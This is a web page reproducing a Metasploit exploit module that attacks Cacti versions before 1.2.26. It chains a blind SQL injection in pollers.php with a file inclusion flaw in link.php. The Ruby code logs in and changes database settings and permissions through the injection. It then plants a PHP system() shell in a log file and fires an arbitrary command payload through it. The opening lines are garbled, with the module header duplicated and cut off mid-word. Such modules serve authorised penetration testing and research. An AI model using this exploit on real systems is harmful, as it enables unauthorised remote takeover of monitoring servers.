Cacti pollers.php SQL Injection Remote Code Execution

Details
Category: Vulnerabilities
Hits: 38
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exp ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::SQLi
include Msf::Exploit::FileDropper
prepend Msf::Exploit::Remote::AutoCheck

class CactiError < StandardError; end
class CactiNotFoundError < CactiError; end
class CactiVersionNotFoundError < CactiError; end
class CactiNoAccessError < CactiError; end
class CactiCsrfNotFoundError < CactiError; end
class CactiLoginError < CactiError; end

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Cacti RCE via SQLi in pollers.php',
'Description' => %q{
This exploit module leverages a SQLi (CVE-2023-49085) and a LFI
(CVE-2023-49084) vulnerability in Cacti versions prior to 1.2.26 to
achieve RCE. Authentication is needed and the account must have access
to the vulnerable PHP script (`pollers.php`). This is granted by
setting the `Sites/Devices/Data` permission in the `General
Administration` section.
},
'License' => MSF_LICENSE,
'Author' => [
'Aleksey Solovev', # Initial research and discovery
'Christophe De La Fuente' # Metasploit module
],
'References' => [
[ 'URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-vr3c-38wh-g855'], # SQLi
[ 'URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-pfh9-gwm6-86vp'], # LFI (RCE)
[ 'CVE', '2023-49085'], # SQLi
[ 'CVE', '2023-49084'] # LFI (RCE)
],
'Platform' => ['unix linux win'],
'Privileged' => false,
'Arch' => ARCH_CMD,
'Targets' => [
[
'Linux Command',
{
'Arch' => ARCH_CMD,
'Platform' => [ 'unix', 'linux' ]
}
],
[
'Windows Command',
{
'Arch' => ARCH_CMD,
'Platform' => 'win'
}
]
],
'DefaultOptions' => {
'SqliDelay' => 3
},
'DisclosureDate' => '2023-12-20',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
}
)
)

register_options(
[
OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
OptString.new('PASSWORD', [ true, 'Password to login with', 'admin']),
OptString.new('TARGETURI', [ true, 'The base URI of Cacti', '/cacti'])
]
)
end

def sqli
@sqli ||= create_sqli(dbms: SQLi::MySQLi::TimeBasedBlind) do |sqli_payload|
sqli_final_payload = '"'
sqli_final_payload << ';select ' unless sqli_payload.start_with?(';') || sqli_payload.start_with?(' and')
sqli_final_payload << "#{sqli_payload};select * from poller where 1=1 and '%'=""
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'pollers.php'),
'method' => 'POST',
'keep_cookies' => true,
'vars_post' => {
'__csrf_magic' => @csrf_token,
'name' => 'Main Poller',
'hostname' => 'localhost',
'timezone' => '',
'notes' => '',
'processes' => '1',
'threads' => '1',
'id' => '2',
'save_component_poller' => '1',
'action' => 'save',
'dbhost' => sqli_final_payload
},
'vars_get' => {
'header' => 'false'
}
)
end
end

def get_version(html)
# This will return an empty string if there is no match
version_str = html.xpath('//div[@class="versionInfo"]').text
unless version_str.include?('The Cacti Group')
raise CactiNotFoundError, 'The web server is not running Cacti'
end
unless version_str.match(/Version (?<version>d{1,2}.d{1,2}.d{1,2})/)
raise CactiVersionNotFoundError, 'Could not detect the version'
end

Regexp.last_match[:version]
end

def get_csrf_token(html)
html.xpath('//form/input[@name="__csrf_magic"]/@value').text
end

def do_login
if @csrf_token.blank? || @cacti_version.blank?
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'GET',
'keep_cookies' => true
)
if res.nil?
raise CactiNoAccessError, 'Could not access `index.php` - no response'
end

html = res.get_html_document
if @csrf_token.blank?
print_status('Getting the CSRF token to login')
@csrf_token = get_csrf_token(html)
if @csrf_token.empty?
# raise an error since without the CSRF token, we cannot login
raise CactiCsrfNotFoundError, 'Cannot get the CSRF token'
else
vprint_good("CSRF token: #{@csrf_token}")
end
end

if @cacti_version.blank?
print_status('Getting the version')
begin
@cacti_version = get_version(html)
vprint_good("Version: #{@cacti_version}")
rescue CactiError => e
# We can still log in without the version
print_bad("Could not get the version, the exploit might fail: #{e}")
end
end
end

print_status("Attempting login with user `#{datastore['USERNAME']}` and password `#{datastore['PASSWORD']}`")
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST',
'keep_cookies' => true,
'vars_post' => {
'__csrf_magic' => @csrf_token,
'action' => 'login',
'login_username' => datastore['USERNAME'],
'login_password' => datastore['PASSWORD']
}
)
raise CactiNoAccessError, 'Could not login - no response' if res.nil?
raise CactiLoginError, "Login failure - unexpected HTTP response code: #{res.code}" unless res.code == 302

print_good('Logged in')
end

def check
# Step 1 - Check if the target is Cacti and get the version
print_status('Checking Cacti version')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'GET',
'keep_cookies' => true
)
return CheckCode::Unknown('Could not connect to the web server - no response') if res.nil?

html = res.get_html_document
begin
@cacti_version = get_version(html)
version_msg = "The web server is running Cacti version #{@cacti_version}"
rescue CactiNotFoundError => e
return CheckCode::Safe(e.message)
rescue CactiVersionNotFoundError => e
return CheckCode::Unknown(e.message)
end

if Rex::Version.new(@cacti_version) < Rex::Version.new('1.2.26')
print_good(version_msg)
else
return CheckCode::Safe(version_msg)
end

# Step 2 - Login
@csrf_token = get_csrf_token(html)
return CheckCode::Unknown('Could not get the CSRF token from `index.php`') if @csrf_token.empty?

begin
do_login
rescue CactiError => e
return CheckCode::Unknown("Login failed: #{e}")
end

@logged_in = true

# Step 3 - Check if the user has enough permissions to reach `pollers.php`
print_status('Checking permissions to access `pollers.php`')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'pollers.php'),
'method' => 'GET',
'keep_cookies' => true,
'headers' => {
'X-Requested-With' => 'XMLHttpRequest'
}
)
return CheckCode::Unknown('Could not access `pollers.php` - no response') if res.nil?
return CheckCode::Safe('Could not access `pollers.php` - insufficient permissions') if res.code == 401
return CheckCode::Unknown("Could not access `pollers.php` - unexpected HTTP response code: #{res.code}") unless res.code == 200

# Step 4 - Check if it is vulnerable to SQLi
print_status('Attempting SQLi to check if the target is vulnerable')
return CheckCode::Safe('Blind SQL injection test failed') unless sqli.test_vulnerable

CheckCode::Vulnerable
end

def get_ext_link_id
# Get an unused External Link ID with a time-based SQLi
@ext_link_id = rand(1000..9999)
loop do
_res, elapsed_time = Rex::Stopwatch.elapsed_time do
sqli.raw_run_sql("if(id,sleep(#{datastore['SqliDelay']}),null) from external_links where id=#{@ext_link_id}")
end
break if elapsed_time < datastore['SqliDelay']

@ext_link_id = rand(1000..9999)
end
vprint_good("Got external link ID #{@ext_link_id}")
end

def exploit
# `#do_login` will take care of populating `@csrf_token` and `@cacti_version`
unless @logged_in
begin
do_login
rescue CactiError => e
fail_with(Failure::NoAccess, "Login failure: #{e}")
end
end

@log_file_path = "log/cacti#{rand(1..999)}.log"
print_status("Backing up the current log file path and adding a new path (#{@log_file_path}) to the `settings` table")
@log_setting_name_bak = '_path_cactilog'
sqli.raw_run_sql(";update settings set name='#{@log_setting_name_bak}' where name='path_cactilog'")
@do_settings_cleanup = true
sqli.raw_run_sql(";insert into settings (name,value) values ('path_cactilog','#{@log_file_path}')")
register_file_for_cleanup(@log_file_path)

print_status("Inserting the log file path `#{@log_file_path}` to the external links table")
log_file_path_lfi = "../../#{@log_file_path}"
# Some specific path tarversal needs to be prepended to bypass the v1.2.25 fix in `link.php` (line 79):
# $file = $config['base_path'] . "/include/content/" . str_replace('../', '', $page['contentfile']);
log_file_path_lfi = "....//....//#{@log_file_path}" if @cacti_version && Rex::Version.new(@cacti_version) == Rex::Version.new('1.2.25')
get_ext_link_id
sqli.raw_run_sql(";insert into external_links (id,sortorder,enabled,contentfile,title,style) values (#{@ext_link_id},2,'on','#{log_file_path_lfi}','Log-#{rand_text_numeric(3..5)}','CONSOLE')")
@do_ext_link_cleanup = true

print_status('Getting the user ID and setting permissions (it might take a few minutes)')
user_id = sqli.run_sql("select id from user_auth where username='#{datastore['USERNAME']}'")
fail_with(Failure::NotFound, 'User ID not found') unless user_id =~ (/Ad+/)
sqli.raw_run_sql(";insert into user_auth_realm (realm_id,user_id) values (#{10000 + @ext_link_id},#{user_id})")
@do_perms_cleanup = true

print_status('Logging in again to apply new settings and permissions')
# Keep a copy of the cookie_jar and the CSRF token to be used later by the cleanup routine and remove all cookies to login again.
# This is required since this new session will block after triggering the payload and we won't be able to reuse it to cleanup.
cookie_jar_bak = cookie_jar.clone
cookie_jar.clear
csrf_token_bak = @csrf_token
# Setting `@csrf_token` to nil will force `#do_login` to get a fresh CSRF token
@csrf_token = nil
begin
do_login
rescue CactiError => e
fail_with(Failure::NoAccess, "Login failure: #{e}")
end

print_status('Poisoning the log')
header_name = rand_text_alpha(1).upcase
sqli.raw_run_sql(" and updatexml(rand(),concat(CHAR(60),'?=system($_SERVER[\'HTTP_#{header_name}\']);?>',CHAR(126)),null)")

print_status('Triggering the payload')
# Expecting no response
send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'link.php'),
'method' => 'GET',
'keep_cookies' => true,
'headers' => {
header_name => payload.encoded
},
'vars_get' => {
'id' => @ext_link_id,
'headercontent' => 'true'
}
}, 0)

# Restore the cookie_jar and the CSRF token to run cleanup without being blocked
cookie_jar.clear
self.cookie_jar = cookie_jar_bak
@csrf_token = csrf_token_bak
end

def cleanup
super

if @do_ext_link_cleanup
print_status('Cleaning up external link using SQLi')
sqli.raw_run_sql(";delete from external_links where id=#{@ext_link_id}")
end

if @do_perms_cleanup
print_status('Cleaning up permissions using SQLi')
sqli.raw_run_sql(";delete from user_auth_realm where realm_id=#{10000 + @ext_link_id}")
end

if @do_settings_cleanup
print_status('Cleaning up the log path in `settings` table using SQLi')
sqli.raw_run_sql(";delete from settings where name='path_cactilog' and value='#{@log_file_path}'")
sqli.raw_run_sql(";update settings set name='path_cactilog' where name='#{@log_setting_name_bak}'")
end
end
end